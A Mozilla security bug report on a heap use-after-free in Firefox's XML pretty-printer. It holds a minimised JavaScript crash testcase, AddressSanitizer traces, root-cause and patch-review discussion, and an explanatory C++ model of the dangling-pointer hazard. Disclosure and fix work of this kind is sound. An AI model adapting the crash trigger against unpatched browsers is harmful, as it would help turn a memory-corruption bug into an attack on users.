heap-use-after-free in nsXMLPrettyPrinter::PrettyPrint

VERIFIED FIXED in Firefox 58

Status

Status: VERIFIED FIXED
Product: Core
Component: DOM
Priority: P1
Severity: critical
Reported: 4 months ago
Modified: 14 days ago

People

(Reporter: Nils, Assigned: mats)

Tracking

Version: 58 Branch
Target Milestone: mozilla59
Keywords: csectype-uaf, regression, sec-high
Points: ---
Bug Flags:
sec-bounty +
in-testsuite ?

Firefox Tracking Flags

(thunderbird_esr52 unaffected, firefox-esr52 unaffected, firefox57 unaffected, firefox58+ verified, firefox59+ verified)

Details

(Whiteboard: [post-critsmash-triage])

Attachments

(4 attachments)

(Reporter)

Description

4 months ago
Created attachment 8926358 [details]
crash.html (minimised testcase)

The following testcase crashes the latest ASAN build of Firefox nightly.

crash.html:
<script>
// Spins the event loop with a synchronous XHR; the request itself is not
// expected to succeed (see the discussion of the sync XHR in the comments).
function spin () {
    var x=new XMLHttpRequest();
    x.open("POST","https://mozilla.org",false);
    try{x.send("X");}catch(e){}
}
function start() {
    // The text/xml subdocument is what gets the XML pretty printer involved.
    o1=document.createElement('iframe');
    o1.src='data:text/xml,<x/>';
    o4=document;
    window.setTimeout("fun0()",10);
}
function fun0() {
    o150=document.documentElement.cloneNode(true);
    document.documentElement.appendChild(o150);
    o170=document.createElement('style');
    spin();
    o171=document.createTextNode("@import'/p/r'; { border-top-color} *{ scroll-snap-points-x: repeat(28rem");
    o170.appendChild(o171);
    o150.appendChild(o170);
    o4.write('<html><body><div></div><div></div></body></html>');
    window.top.document.documentElement.appendChild(o1);
    window.top.document.documentElement.appendChild(o170);
    window.setTimeout("location.reload()", 1000);
}
</script>
<body onload="start()"></body>

ASAN output:
=================================================================
==24871==ERROR: AddressSanitizer: heap-use-after-free on address 0x622000042100 at pc 0x7f4c0d8215b6 bp 0x7ffd226c0d30 sp 0x7ffd226c0d28
READ of size 8 at 0x622000042100 thread T0 (file:// Content)
    #0 0x7f4c0d8215b5 in nsXMLPrettyPrinter::PrettyPrint(nsIDocument*, bool*) /builds/worker/workspace/build/src/dom/xml/nsXMLPrettyPrinter.cpp:157:16
    #1 0x7f4c0d81f70f in nsXMLContentSink::MaybePrettyPrint() /builds/worker/workspace/build/src/dom/xml/nsXMLContentSink.cpp:214:17
    #2 0x7f4c0d822bd4 in nsXMLContentSink::DidBuildModel(bool) /builds/worker/workspace/build/src/dom/xml/nsXMLContentSink.cpp:306:5
    #3 0x7f4c0d8231d3 in non-virtual thunk to nsXMLContentSink::DidBuildModel(bool) /builds/worker/workspace/build/src/dom/xml/nsXMLContentSink.cpp:264:19
    #4 0x7f4c091ec6c5 in DidBuildModel /builds/worker/workspace/build/src/parser/htmlparser/nsParser.cpp:491:37
    #5 0x7f4c091ec6c5 in nsParser::ResumeParse(bool, bool, bool) /builds/worker/workspace/build/src/parser/htmlparser/nsParser.cpp:1101
    #6 0x7f4c091f242c in nsParser::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/parser/htmlparser/nsParser.cpp:1475:10
    #7 0x7f4c0911aee6 in nsDocumentOpenInfo::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsURILoader.cpp:357:15
    #8 0x7f4c076280c5 in nsBaseChannel::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/netwerk/base/nsBaseChannel.cpp:878:18
    #9 0x7f4c0762849f in non-virtual thunk to nsBaseChannel::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/netwerk/base/nsBaseChannel.cpp:864:16
    #10 0x7f4c076758e6 in nsInputStreamPump::OnStateStop() /builds/worker/workspace/build/src/netwerk/base/nsInputStreamPump.cpp:704:20
    #11 0x7f4c07673cb6 in nsInputStreamPump::OnInputStreamReady(nsIAsyncInputStream*) /builds/worker/workspace/build/src/netwerk/base/nsInputStreamPump.cpp:428:25
    #12 0x7f4c07464d4d in nsInputStreamReadyEvent::Run() /builds/worker/workspace/build/src/xpcom/io/nsStreamUtils.cpp:97:20
    #13 0x7f4c074a6ba1 in mozilla::SchedulerGroup::Runnable::Run() /builds/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:396:25
    #14 0x7f4c074cbbd6 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1037:14
    #15 0x7f4c074e6098 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:513:10
    #16 0x7f4c082b8711 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:97:21
    #17 0x7f4c08218d6b in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #18 0x7f4c08218d6b in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #19 0x7f4c08218d6b in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #20 0x7f4c0dc9f0ef in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:158:27
    #21 0x7f4c11fbb097 in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:877:22
    #22 0x7f4c08218d6b in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #23 0x7f4c08218d6b in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #24 0x7f4c08218d6b in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #25 0x7f4c11fbaa4a in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:703:34
    #26 0x4ec2de in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:63:30
    #27 0x4ec2de in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:280
    #28 0x7f4c24c7382f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #29 0x41dbc8 in _start (/fuzzer3/firefox/firefox+0x41dbc8)

0x622000042100 is located 0 bytes inside of 5768-byte region [0x622000042100,0x622000043788)
freed by thread T0 (file:// Content) here:
    #0 0x4bc0fb in __interceptor_free /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:47:3
    #1 0x7f4c0e404b5e in mozilla::PresShell::Release() /builds/worker/workspace/build/src/layout/base/PresShell.cpp:840:1
    #2 0x7f4c0e50e8fb in assign_assuming_AddRef /builds/worker/workspace/build/src/obj-firefox/dist/include/nsCOMPtr.h:355:7
    #3 0x7f4c0e50e8fb in operator= /builds/worker/workspace/build/src/obj-firefox/dist/include/nsCOMPtr.h:631
    #4 0x7f4c0e50e8fb in nsDocumentViewer::DestroyPresShell() /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:4645
    #5 0x7f4c0e505c24 in nsDocumentViewer::Hide() /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:2245:3
    #6 0x7f4c115993c9 in SetVisibility /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:6612:9
    #7 0x7f4c115993c9 in non-virtual thunk to nsDocShell::SetVisibility(bool) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:6602
    #8 0x7f4c0a38452a in nsFrameLoader::Hide() /builds/worker/workspace/build/src/dom/base/nsFrameLoader.cpp:1467:12
    #9 0x7f4c0e86cc90 in nsSubDocumentFrame::DestroyFrom(nsIFrame*, mozilla::layout::PostFrameDestroyData&) /builds/worker/workspace/build/src/layout/generic/nsSubDocumentFrame.cpp:1029:22
    #10 0x7f4c0e80209c in nsLineBox::DeleteLineList(nsPresContext*, nsLineList&, nsIFrame*, nsFrameList*, mozilla::layout::PostFrameDestroyData&) /builds/worker/workspace/build/src/layout/generic/nsLineBox.cpp:402:14
    #11 0x7f4c0e62be27 in nsBlockFrame::DestroyFrom(nsIFrame*, mozilla::layout::PostFrameDestroyData&) /builds/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:331:3
    #12 0x7f4c0e62c98d in DestroyFramesFrom /builds/worker/workspace/build/src/layout/generic/nsFrameList.cpp:59:12
    #13 0x7f4c0e62c98d in nsContainerFrame::DestroyFrom(nsIFrame*, mozilla::layout::PostFrameDestroyData&) /builds/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:226
    #14 0x7f4c0e689669 in nsCanvasFrame::DestroyFrom(nsIFrame*, mozilla::layout::PostFrameDestroyData&) /builds/worker/workspace/build/src/layout/generic/nsCanvasFrame.cpp:160:21
    #15 0x7f4c0e62c98d in DestroyFramesFrom /builds/worker/workspace/build/src/layout/generic/nsFrameList.cpp:59:12
    #16 0x7f4c0e62c98d in nsContainerFrame::DestroyFrom(nsIFrame*, mozilla::layout::PostFrameDestroyData&) /builds/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:226
    #17 0x7f4c0e51fde4 in nsIFrame::Destroy() /builds/worker/workspace/build/src/layout/generic/nsIFrame.h:674:5
    #18 0x7f4c0e6a0ab2 in nsContainerFrame::RemoveFrame(mozilla::layout::FrameChildListID, nsIFrame*) /builds/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:174:16
    #19 0x7f4c0e4db818 in RemoveFrame /builds/worker/workspace/build/src/layout/base/nsFrameManager.cpp:535:18
    #20 0x7f4c0e4db818 in nsCSSFrameConstructor::ContentRemoved(nsIContent*, nsIContent*, nsIContent*, nsCSSFrameConstructor::RemoveFlags) /builds/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:8827
    #21 0x7f4c0e4c77e4 in nsCSSFrameConstructor::RecreateFramesForContent(nsIContent*, nsCSSFrameConstructor::InsertionKind) /builds/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:10027:7
    #22 0x7f4c0e3f431a in mozilla::RestyleManager::ProcessRestyledFrames(nsStyleChangeList&) /builds/worker/workspace/build/src/layout/base/RestyleManager.cpp:1513:25
    #23 0x7f4c0e469eba in mozilla::ServoRestyleManager::DoProcessPendingRestyles(mozilla::ServoTraversalFlags) /builds/worker/workspace/build/src/layout/base/ServoRestyleManager.cpp:1159:9
    #24 0x7f4c0e428de0 in ProcessPendingRestyles /builds/worker/workspace/build/src/layout/base/ServoRestyleManager.cpp:1235:3
    #25 0x7f4c0e428de0 in ProcessPendingRestyles /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RestyleManagerInlines.h:44
    #26 0x7f4c0e428de0 in mozilla::PresShell::DoFlushPendingNotifications(mozilla::ChangesToFlush) /builds/worker/workspace/build/src/layout/base/PresShell.cpp:4196
    #27 0x7f4c0a2edb10 in FlushPendingNotifications /builds/worker/workspace/build/src/obj-firefox/dist/include/nsIPresShell.h:572:5
    #28 0x7f4c0a2edb10 in nsDocument::FlushPendingNotifications(mozilla::FlushType, mozilla::FlushTarget) /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:8547
    #29 0x7f4c0e173447 in nsComputedDOMStyle::UpdateCurrentStyleSources(bool) /builds/worker/workspace/build/src/layout/style/nsComputedDOMStyle.cpp:946:13
    #30 0x7f4c0e174fb1 in nsComputedDOMStyle::GetPropertyCSSValue(nsTSubstring<char16_t> const&, mozilla::ErrorResult&) /builds/worker/workspace/build/src/layout/style/nsComputedDOMStyle.cpp:1160:3
    #31 0x7f4c0e172af8 in nsComputedDOMStyle::GetPropertyValue(nsTSubstring<char16_t> const&, nsTSubstring<char16_t>&) /builds/worker/workspace/build/src/layout/style/nsComputedDOMStyle.cpp:479:26
    #32 0x7f4c0d81ffae in nsXMLPrettyPrinter::PrettyPrint(nsIDocument*, bool*) /builds/worker/workspace/build/src/dom/xml/nsXMLPrettyPrinter.cpp:81:28
    #33 0x7f4c0d81f70f in nsXMLContentSink::MaybePrettyPrint() /builds/worker/workspace/build/src/dom/xml/nsXMLContentSink.cpp:214:17
    #34 0x7f4c0d822bd4 in nsXMLContentSink::DidBuildModel(bool) /builds/worker/workspace/build/src/dom/xml/nsXMLContentSink.cpp:306:5
    #35 0x7f4c0d8231d3 in non-virtual thunk to nsXMLContentSink::DidBuildModel(bool) /builds/worker/workspace/build/src/dom/xml/nsXMLContentSink.cpp:264:19
    #36 0x7f4c091ec6c5 in DidBuildModel /builds/worker/workspace/build/src/parser/htmlparser/nsParser.cpp:491:37
    #37 0x7f4c091ec6c5 in nsParser::ResumeParse(bool, bool, bool) /builds/worker/workspace/build/src/parser/htmlparser/nsParser.cpp:1101
    #38 0x7f4c091f242c in nsParser::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/parser/htmlparser/nsParser.cpp:1475:10
    #39 0x7f4c0911aee6 in nsDocumentOpenInfo::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsURILoader.cpp:357:15

previously allocated by thread T0 (file:// Content) here:
    #0 0x4bc44c in malloc /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:64:3
    #1 0x4ed85d in moz_xmalloc /builds/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:84:17
    #2 0x7f4c0a2b9663 in operator new /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:206:12
    #3 0x7f4c0a2b9663 in nsDocument::CreateShell(nsPresContext*, nsViewManager*, mozilla::StyleSetHandle) /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:4146
    #4 0x7f4c0e5015ef in nsDocumentViewer::InitPresentationStuff(bool) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:684:27
    #5 0x7f4c0e500ebf in nsDocumentViewer::InitInternal(nsIWidget*, nsISupports*, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, bool, bool, bool) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:942:10
    #6 0x7f4c0e500127 in nsDocumentViewer::Init(nsIWidget*, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:659:10
    #7 0x7f4c115a11db in nsDocShell::SetupNewViewer(nsIContentViewer*) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:9558:7
    #8 0x7f4c1159fb9c in nsDocShell::Embed(nsIContentViewer*, char const*, nsISupports*) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7382:17
    #9 0x7f4c11538905 in nsDocShell::CreateContentViewer(nsTSubstring<char> const&, nsIRequest*, nsIStreamListener**) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:9365:3
    #10 0x7f4c11536210 in nsDSURIContentListener::DoContent(nsTSubstring<char> const&, bool, nsIRequest*, nsIStreamListener**, bool*) /builds/worker/workspace/build/src/docshell/base/nsDSURIContentListener.cpp:196:21
    #11 0x7f4c0911b5ea in nsDocumentOpenInfo::TryContentListener(nsIURIContentListener*, nsIChannel*) /builds/worker/workspace/build/src/uriloader/base/nsURILoader.cpp:739:28
    #12 0x7f4c09118d93 in nsDocumentOpenInfo::DispatchContent(nsIRequest*, nsISupports*) /builds/worker/workspace/build/src/uriloader/base/nsURILoader.cpp:417:30
    #13 0x7f4c091177bb in nsDocumentOpenInfo::OnStartRequest(nsIRequest*, nsISupports*) /builds/worker/workspace/build/src/uriloader/base/nsURILoader.cpp:295:8
    #14 0x7f4c076276d7 in nsBaseChannel::OnStartRequest(nsIRequest*, nsISupports*) /builds/worker/workspace/build/src/netwerk/base/nsBaseChannel.cpp:859:25
    #15 0x7f4c07674592 in nsInputStreamPump::OnStateStart() /builds/worker/workspace/build/src/netwerk/base/nsInputStreamPump.cpp:518:25
    #16 0x7f4c07673c1e in nsInputStreamPump::OnInputStreamReady(nsIAsyncInputStream*) /builds/worker/workspace/build/src/netwerk/base/nsInputStreamPump.cpp:421:25
    #17 0x7f4c07464d4d in nsInputStreamReadyEvent::Run() /builds/worker/workspace/build/src/xpcom/io/nsStreamUtils.cpp:97:20
    #18 0x7f4c074a6ba1 in mozilla::SchedulerGroup::Runnable::Run() /builds/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:396:25
    #19 0x7f4c074cbbd6 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1037:14
    #20 0x7f4c074e6098 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:513:10
    #21 0x7f4c082b8711 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:97:21
    #22 0x7f4c08218d6b in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #23 0x7f4c08218d6b in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #24 0x7f4c08218d6b in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #25 0x7f4c0dc9f0ef in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:158:27
    #26 0x7f4c11fbb097 in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:877:22
    #27 0x7f4c08218d6b in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #28 0x7f4c08218d6b in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #29 0x7f4c08218d6b in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #30 0x7f4c11fbaa4a in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:703:34
    #31 0x4ec2de in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:63:30
    #32 0x4ec2de in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:280
    #33 0x7f4c24c7382f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)

SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/workspace/build/src/dom/xml/nsXMLPrettyPrinter.cpp:157:16 in nsXMLPrettyPrinter::PrettyPrint(nsIDocument*, bool*)
Shadow bytes around the buggy address:
  0x0c44800003d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c44800003e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c44800003f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c4480000400: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c4480000410: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c4480000420:[fd]fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4480000430: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4480000440: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4480000450: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4480000460: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4480000470: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==24871==ABORTING
(Reporter)

Comment 1

4 months ago
Created attachment 8926359 [details]
ASAN output
Keywords: csectype-uaf, sec-high
Bug 1400618 maybe?
Group: core-security → dom-core-security
Flags: needinfo?(mats)
(Assignee)

Comment 3

4 months ago
That seems plausible if it's a recent regression.
I can't reproduce the crash in any of my local builds though.
Flags: needinfo?(mats)
Priority: -- → P1
(In reply to Mats Palmgren (:mats) from comment #3)
> That seems plausible if it's a recent regression.
> I can't reproduce the crash in any of my local builds though.

I can't reproduce this either.  Nils, can you repro on the latest nightly?  Anything special here required to repro?
Flags: needinfo?(nils)
(Reporter)

Comment 5

3 months ago
Oddly enough, having the following flag set in prefs.js is required to reproduce the issue:

user_pref("browser.rights.3.shown", true);

With this it still reproduces on the very latest build from today (59.0a1).
Flags: needinfo?(nils)
Bisects to:
Start: 597025d8888fa91b9418231f33e65424d384d83f (20171107102812)
End: 923836aebbc328d1a971f6ce32a99d9aa4d1345a (20171107105646)
https://hg.mozilla.org/integration/autoland/pushloghtml?fromchange=597025d8888fa91b9418231f33e65424d384d83f&tochange=923836aebbc328d1a971f6ce32a99d9aa4d1345a
(Assignee)

Comment 7

3 months ago
Thanks, I can reproduce it with that pref set.
Assignee: nobody → mats
Blocks: 1400618
Severity: normal → critical
status-firefox57: --- → unaffected
status-firefox59: --- → affected
status-firefox-esr52: --- → unaffected
status-thunderbird_esr52: --- → unaffected
Keywords: regression
OS: Unspecified → All
Hardware: Unspecified → All
(Assignee)

Comment 8

3 months ago
Created attachment 8928234 [details]
stack for shell Destroy

The root cause is that the shell has been destroyed before
we get to the DestroyFramesForAndRestyle call.  It's destroyed
by the flush associated with the GetComputedStyle call here:
https://searchfox.org/mozilla-central/rev/bab833ebeef6b2202e71f81d225b968283521fd6/dom/xml/nsXMLPrettyPrinter.cpp#72,157
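The hazard described in comment 8 is a general one: a raw pointer to a refcounted object (here the pres shell) is taken, then a call that can flush layout runs and releases that object, and the stale pointer is used afterwards. The toy model below is an added example, not Mozilla code and not the patch attached to this bug (which is not shown on the page); the `Document`, `PresShell`, `pendingRestyle` and `restyleCalls` names are constructed stand-ins, and `std::shared_ptr` plays the role of Gecko's `RefPtr`. It shows that a pointer cached across the flush dangles, and the two usual ways to harden such code: re-fetch the pointer after any call that can flush, or hold a strong reference across it and still check the torn-down state.

```cpp
#include <cstdio>
#include <memory>
#include <string>

// Constructed model: a Document owns its PresShell through a refcounted
// pointer, and a layout flush may drop that pointer.
struct PresShell {
    bool destroying = false;      // mirrors the "shell is being torn down" state
    int restyleCalls = 0;
    void Destroy() { destroying = true; }
    void DestroyFramesForAndRestyle() { ++restyleCalls; }
};

struct Document {
    std::shared_ptr<PresShell> shell = std::make_shared<PresShell>();
    bool pendingRestyle = false;  // a queued restyle that will tear down the shell

    PresShell* GetShell() { return shell.get(); }

    // Models PresShell::DoFlushPendingNotifications: processing restyles can
    // destroy frames, hide a subdocument and release its shell (compare the
    // "freed by" stack in the report).
    void FlushPendingNotifications() {
        if (pendingRestyle && shell) {
            shell->Destroy();
            shell.reset();        // the document's strong reference is dropped
            pendingRestyle = false;
        }
    }

    // Models nsComputedDOMStyle::GetPropertyValue, which flushes before answering.
    std::string GetComputedStyle(const std::string& prop) {
        FlushPendingNotifications();
        return prop == "display" ? "block" : "";
    }
};

// Why caching the raw shell pointer before the flush is unsafe. A weak_ptr
// stands in for the raw pointer so the check can be made without touching
// freed memory. Returns true when the cached pointer would be dangling, i.e.
// when a later shell->DestroyFramesForAndRestyle() would be a use-after-free.
bool RawPointerDanglesAcrossFlush(Document& doc) {
    std::weak_ptr<PresShell> cached = doc.shell;   // "PresShell* shell = doc->GetShell();"
    doc.GetComputedStyle("display");                // may flush and free the shell
    return cached.expired();
}

// Hardened variant 1: never carry the pointer across a call that can flush;
// re-fetch it afterwards and bail out if the shell is gone.
bool PrettyPrintRefetch(Document& doc) {
    doc.GetComputedStyle("display");
    PresShell* shell = doc.GetShell();
    if (!shell || shell->destroying) {
        return false;                               // nothing left to pretty-print into
    }
    shell->DestroyFramesForAndRestyle();
    return true;
}

// Hardened variant 2: hold a strong reference across the flush so the memory
// cannot be freed underneath us, and still check the destroyed state, because
// keeping the allocation alive does not make calling into a torn-down shell valid.
bool PrettyPrintStrongRef(Document& doc) {
    std::shared_ptr<PresShell> shell = doc.shell;   // RefPtr<nsIPresShell> equivalent
    if (!shell) return false;
    doc.GetComputedStyle("display");
    if (shell->destroying) {
        return false;                               // alive in memory, but torn down
    }
    shell->DestroyFramesForAndRestyle();
    return true;
}

int main() {
    Document racy;
    racy.pendingRestyle = true;
    std::printf("raw pointer dangles: %d\n", RawPointerDanglesAcrossFlush(racy));
    Document a; a.pendingRestyle = true;
    Document b; b.pendingRestyle = true;
    std::printf("refetch bails: %d, strong ref bails: %d\n",
                !PrettyPrintRefetch(a), !PrettyPrintStrongRef(b));
    return 0;
}
```

The `destroying` check in the second variant matters: in the real engine the shell is put into a destroyed state before its last reference goes away, so a strong reference alone turns a memory-safety bug into a logic bug rather than removing it.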
(Assignee)

Comment 9

3 months ago
Created attachment 8928266 [details] [diff] [review]
fix
Attachment #8928266 - Flags: review?(bzbarsky)
(Assignee)

Comment 10

3 months ago
I wasn't able to make the minimized testcase work as a crashtest.
I hit a fatal assert in the network code saying "attempting to connect
to external URI" or something like that.  I'm guessing it's from
the "x.open("POST","https://mozilla.org",false)" in the test and that
the crashtest framework prevents such connections with some pref.
Flags: in-testsuite?
The sync XHR there is just a way to spin the event loop.  The one place it's used is to basically do a wait between the assignments to o170 and o171.

Is it really needed?  Does just waiting until the load event has fired on the text/xml iframe before running the rest of fun0 there work?

And yes, the test harness prevents network connections to anything that's not on a small whitelist of sites (which are mapped to the harness http server), because any connections that actually hit the network cause intermittent test orange.
Flags: needinfo?(mats)
Comment on attachment 8928266 [details] [diff] [review]
fix

r=me
Attachment #8928266 - Flags: review?(bzbarsky) → review+
(Assignee)

Comment 13

3 months ago
(In reply to Boris Zbarsky [:bz] (no decent commit message means r-) from comment #11)
> The sync XHR there is just a way to spin the event loop.  The one place it's
> used is to basically do a wait between the assignments to o170 and o171.
> 
> Is it really needed?  Does just waiting until the load event has fired on
> the text/xml iframe before running the rest of fun0 there work?

It doesn't work because its onload isn't called before the line
window.top.document.documentElement.appendChild(o1) happens
(which inserts the <iframe>).

> And yes, the test harness prevents network connections to anything that's
> not on a small whitelist of sites (which are mapped to the harness http
> server), because any connections that actually hit the network cause
> intermittent test orange.

OK.  Fwiw, I tried using x.open("POST","://",false); together with HTTP
in the manifest but that just gave:
SecurityError: Permission denied to access property "document" on cross-origin object
(at the "appendChild(o1)")
Flags: needinfo?(mats)
> because its onload isn't called before the line window.top.document.documentElement.appendChild(o1)

OK, then what is that event loop spin waiting for?
(Assignee)

Comment 15

3 months ago
Comment on attachment 8928266 [details] [diff] [review]
fix

[Security approval request comment]
How easily could an exploit be constructed based on the patch?

Very unlikely.

Do comments in the patch, the check-in comment, or tests included in the patch paint a bulls-eye on the security problem?

No.

Which older supported branches are affected by this flaw?

v58

If not all supported branches, which bug introduced the flaw?

Bug 1400618.

Do you have backports for the affected branches? If not, how different, hard to create, and risky will they be?

Same patch.

How likely is this patch to cause regressions; how much testing does it need?

Unlikely; None.
Attachment #8928266 - Flags: sec-approval?
(Assignee)

Comment 16

3 months ago
(In reply to Boris Zbarsky [:bz] (no decent commit message means r-) from comment #14)
> OK, then what is that event loop spin waiting for?

I don't know.
Comment on attachment 8928266 [details] [diff] [review]
fix

sec-approval+. We'll want a beta patch nominated as well.
Attachment #8928266 - Flags: sec-approval? → sec-approval+
tracking-firefox58: --- → +
tracking-firefox59: --- → +
(Assignee)

Comment 19

3 months ago
Comment on attachment 8928266 [details] [diff] [review]
fix

Approval Request Comment
[Feature/Bug causing the regression]:
[User impact if declined]: possibly exploitable crash
[Is this code covered by automated tests?]: no
[Has the fix been verified in Nightly?]: no
[Needs manual test from QE? If yes, steps to reproduce]: no
[List of other uplifts needed for the feature/fix]: none
[Is the change risky?]: no
[Why is the change risky/not risky?]: trivial change
[String changes made/needed]: none
Attachment #8928266 - Flags: approval-mozilla-beta?
Comment on attachment 8928266 [details] [diff] [review]
fix

Fix a sec-high. Beta58+.
Attachment #8928266 - Flags: approval-mozilla-beta? → approval-mozilla-beta+
Status: NEW → RESOLVED
Last Resolved: 3 months ago
Resolution: --- → FIXED
Group: dom-core-security → core-security-release
Flags: qe-verify+
Whiteboard: [post-critsmash-triage]
Reproduced the initial crash using an old Nightly ASan build (2017-11-08) on Ubuntu 16.04 64-bit.

==3249==ERROR: AddressSanitizer: heap-use-after-free on address 0x622000000100 at pc 0x7f0f40d141a6 bp 0x7ffd1e985c10 sp 0x7ffd1e985c08
READ of size 8 at 0x622000000100 thread T0 (file:// Content)
    #0 0x7f0f40d141a5 in nsXMLPrettyPrinter::PrettyPrint(nsIDocument*, bool*) /builds/worker/workspace/build/src/dom/xml/nsXMLPrettyPrinter.cpp:157:16
    #1 0x7f0f40d122ff in nsXMLContentSink::MaybePrettyPrint() /builds/worker/workspace/build/src/dom/xml/nsXMLContentSink.cpp:214:17
    #2 0x7f0f40d157c4 in nsXMLContentSink::DidBuildModel(bool) /builds/worker/workspace/build/src/dom/xml/nsXMLContentSink.cpp:306:5
    #3 0x7f0f40d15dc3 in non-virtual thunk to nsXMLContentSink::DidBuildModel(bool) /builds/worker/workspace/build/src/dom/xml/nsXMLContentSink.cpp:264:19
    #4 0x7f0f3c6d8725 in DidBuildModel /builds/worker/workspace/build/src/parser/htmlparser/nsParser.cpp:491:37
